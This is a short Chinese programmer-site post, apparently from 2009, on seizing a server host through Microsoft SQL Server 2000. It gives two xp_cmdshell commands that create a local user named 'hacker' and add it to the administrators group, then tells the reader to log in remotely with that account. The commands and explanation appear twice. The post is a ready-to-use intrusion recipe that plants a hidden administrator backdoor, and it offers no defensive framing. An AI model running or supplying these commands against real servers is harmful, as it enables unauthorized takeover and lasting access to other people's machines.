通过MSSQL 2000 入侵服务器主机器的命令
程序员文章站
2022-04-27 10:36:52
首先确保得到数据库超级管理员权限
然后执行如下SQL命令:
1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup adm... 09-04-13...
首先确保得到数据库超级管理员权限
然后执行如下sql命令:
1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
解释:
1.通过调用cmdshell 也就是cmd 执行dos 命令创建hacker用户
2 授权给hacker用户超级管理员权限..
3 这时候您就可以使用创建的帐户去远程登陆这台主机了
然后执行如下sql命令:
1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
解释:
1.通过调用cmdshell 也就是cmd 执行dos 命令创建hacker用户
2 授权给hacker用户超级管理员权限..
3 这时候您就可以使用创建的帐户去远程登陆这台主机了
上一篇: Unicode的消息介绍(图)